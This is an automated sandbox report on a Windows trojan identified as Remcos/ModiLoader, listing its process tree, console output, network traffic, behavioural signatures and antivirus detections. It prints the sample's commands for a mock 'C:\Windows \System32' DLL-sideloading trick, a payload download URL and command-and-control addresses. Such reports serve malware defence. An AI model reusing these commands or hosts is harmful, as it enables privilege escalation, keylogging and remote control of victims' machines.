Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Dec. 8, 2023, 6:33 p.m.	Dec. 8, 2023, 6:35 p.m.

Size	1.7MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`c0af31044fcaa756f32f13007d50724f`
SHA256	`59446c75c678dcd9b9ab8c5f7e5d9566c2a5137ef7c128732f6ffcc5340e44e8`
CRC32	`8372F65A`
ssdeep	`24576:g90C4/05Xhq/4dB6E8oqGQCbPEzbjvy27wPtmQ4Xl+gWeq9X9VxHfg8IitnJ0MTp:g94MN91+vzwPtmQA+qq/H48htnOM1`
Yara	Malicious_Library_Zero - Malicious_Library IsPE32 - (no description) PE_Header_Zero - PE File Signature UPX_Zero - UPX packed file mzp_file_format - MZP(Delphi) file format

cmd.exe cmd /c ""C:\Users\Public\Libraries\IrzhkxyxO.bat" "
2772
- cmd.exe cmd.exe /c mkdir "\\?\C:\Windows "
  2832
- cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"
  2876
- cmd.exe cmd.exe /c ECHO F
  2924
- xcopy.exe xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y
  2960
- cmd.exe cmd.exe /c ECHO F
  3012
- xcopy.exe xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y
  3048
- cmd.exe cmd.exe /c ECHO F
  1152
- xcopy.exe xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y
  1384
- PING.EXE ping 127.0.0.1 -n 6
  1356
colorcpl.exe C:\Windows\System32\colorcpl.exe
2260

Name	Response	Post-Analysis Lookup
geoplugin.net	A 178.237.33.50	178.237.33.50

IP Address	Status	Action
164.124.101.2	Active	Moloch
178.237.33.50	Active	Moloch
20.84.117.57	Active	Moloch
84.252.120.161	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49180 -> 20.84.117.57:2347	2036594	ET JA3 Hash - Remcos 3.x TLS Connection	Malware Command and Control Activity Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.3 192.168.56.101:49180 20.84.117.57:2347	None	None	None

Command line console output was observed (35 events)

Time & API	Arguments	Status	Return
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: C:\Users\Public\Libraries> console_handle: 0x00000007	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: cmd.exe console_handle: 0x00000007	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: /c mkdir "\\?\C:\Windows " console_handle: 0x00000007	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: C:\Users\Public\Libraries> console_handle: 0x00000007	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: cmd.exe console_handle: 0x00000007	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: /c mkdir "\\?\C:\Windows \System32" console_handle: 0x00000007	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: C:\Users\Public\Libraries> console_handle: 0x00000007	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: cmd.exe console_handle: 0x00000007	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: /c ECHO F console_handle: 0x00000007	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: xcopy console_handle: 0x00000007	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y console_handle: 0x00000007	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: C:\Users\Public\Libraries> console_handle: 0x00000007	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: cmd.exe console_handle: 0x00000007	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: /c ECHO F console_handle: 0x00000007	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: xcopy console_handle: 0x00000007	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: "netutils.dll" "C:\Windows \System32\" /K /D /H /Y console_handle: 0x00000007	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: C:\Users\Public\Libraries> console_handle: 0x00000007	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: cmd.exe console_handle: 0x00000007	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: /c ECHO F console_handle: 0x00000007	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: xcopy console_handle: 0x00000007	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y console_handle: 0x00000007	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: C:\Users\Public\Libraries> console_handle: 0x00000007	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: "C:\Windows \System32\easinvoker.exe" console_handle: 0x00000007	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: The system cannot execute the specified program. console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: C:\Users\Public\Libraries> console_handle: 0x00000007	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: ping console_handle: 0x00000007	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: 127.0.0.1 -n 6 console_handle: 0x00000007	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: nul console_handle: 0x00000007	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: The batch file cannot be found. console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: C:easinvoker.exe console_handle: 0x00000003	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: 1 File(s) copied console_handle: 0x00000003	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: C:netutils.dll console_handle: 0x00000003	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: 1 File(s) copied console_handle: 0x00000003	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: C:KDECO.bat console_handle: 0x00000003	1	1
WriteConsoleW Dec. 8, 2023, 6:33 p.m.	buffer: 1 File(s) copied console_handle: 0x00000003	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Dec. 8, 2023, 6:33 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)

section	CODE
section	DATA
section	BSS

The executable uses a known packer (1 event)

packer

BobSoft Mini Delphi -> BoB / BobSoft

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	Connection to IP address				suspicious_request	GET http://84.252.120.161/yakfileloadsonedrivedocumentsuploadgoogleapclouddownloads/211_Irzhkxyxtsv
suspicious_features	GET method with no useragent header				suspicious_request	GET http://geoplugin.net/json.gp

Performs some HTTP requests (2 events)

request	GET http://84.252.120.161/yakfileloadsonedrivedocumentsuploadgoogleapclouddownloads/211_Irzhkxyxtsv
request	GET http://geoplugin.net/json.gp

Allocates read-write-execute memory (usually to unpack itself) (3 events)

Time & API	Arguments	Status	Return
NtProtectVirtualMemory Dec. 8, 2023, 6:33 p.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73662000 process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Dec. 8, 2023, 6:33 p.m.	process_identifier: 2260 region_size: 532480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff		3221225496
NtAllocateVirtualMemory Dec. 8, 2023, 6:33 p.m.	process_identifier: 2260 region_size: 532480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02600000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0

A process attempted to delay the analysis task. (1 event)

description

colorcpl.exe tried to sleep 259 seconds, actually delayed analysis time by 259 seconds

Creates executable files on the filesystem (3 events)

file	C:\Windows \System32\KDECO.bat
file	C:\Windows \System32\netutils.dll
file	C:\Windows \System32\easinvoker.exe

Creates a suspicious process (3 events)

cmdline	cmd.exe /c mkdir "\\?\C:\Windows "
cmdline	cmd.exe /c ECHO F
cmdline	cmd.exe /c mkdir "\\?\C:\Windows \System32"

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00133800', u'virtual_address': u'0x00060000', u'entropy': 7.591665881501721, u'name': u'DATA', u'virtual_size': u'0x001336c0'}

entropy

7.5916658815

description

A section with a high entropy has been found

entropy

0.705073086844

description

Overall entropy of this PE file is high

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	cmd.exe /c mkdir "\\?\C:\Windows "
cmdline	cmd.exe /c mkdir "\\?\C:\Windows \System32"
cmdline	ping 127.0.0.1 -n 6

Communicates with host for which no DNS query was performed (2 events)

host	20.84.117.57
host	84.252.120.161

Creates a windows hook that monitors keyboard input (keylogger) (1 event)

Time & API	Arguments	Status	Return	Repeated
SetWindowsHookExA Dec. 8, 2023, 6:33 p.m.	thread_identifier: 0 callback_function: 0x0260a2a4 hook_identifier: 13 (WH_KEYBOARD_LL) module_address: 0x02600000		0	0

File has been identified by 41 AntiVirus engines on VirusTotal as malicious (41 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.Generic.4!c
MicroWorld-eScan	Trojan.GenericKD.70711338
FireEye	Generic.mg.c0af31044fcaa756
Skyhigh	BehavesLike.Win32.Generic.tc
Cylance	unsafe
Sangfor	Trojan.Win32.Save.a
K7AntiVirus	Trojan-Downloader ( 005a84871 )
K7GW	Trojan-Downloader ( 005a84871 )
Cybereason	malicious.b9e63d
VirIT	Trojan.Win32.Remcos.DVP
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	a variant of Win32/TrojanDownloader.ModiLoader.YS
APEX	Malicious
Kaspersky	HEUR:Backdoor.Win32.Remcos.gen
BitDefender	Trojan.GenericKD.70711338
Avast	Win32:MalwareX-gen [Trj]
Rising	Downloader.Agent!1.EFE4 (CLASSIC)
F-Secure	Heuristic.HEUR/AGEN.1329986
Trapmine	malicious.moderate.ml.score
Emsisoft	Trojan.GenericKD.70711338 (B)
Ikarus	Trojan.Inject
Google	Detected
Avira	HEUR/AGEN.1329986
Antiy-AVL	Trojan/Win32.Wacatac
Microsoft	Trojan:Win32/ModiLoader.DH!MTB
Gridinsoft	Ransom.Win32.Wacatac.sa
Arcabit	Trojan.Generic.D436F82A
ZoneAlarm	HEUR:Backdoor.Win32.Remcos.gen
GData	Win32.Trojan.Agent.QUN8GH
Cynet	Malicious (score: 100)
MAX	malware (ai score=85)
Malwarebytes	Malware.AI.4284803601
Panda	Trj/Chgt.AD
SentinelOne	Static AI - Suspicious PE
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	W32/ModiLoader.YK!tr
AVG	Win32:MalwareX-gen [Trj]
DeepInstinct	MALICIOUS
CrowdStrike	win/malicious_confidence_90% (W)

chrome.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All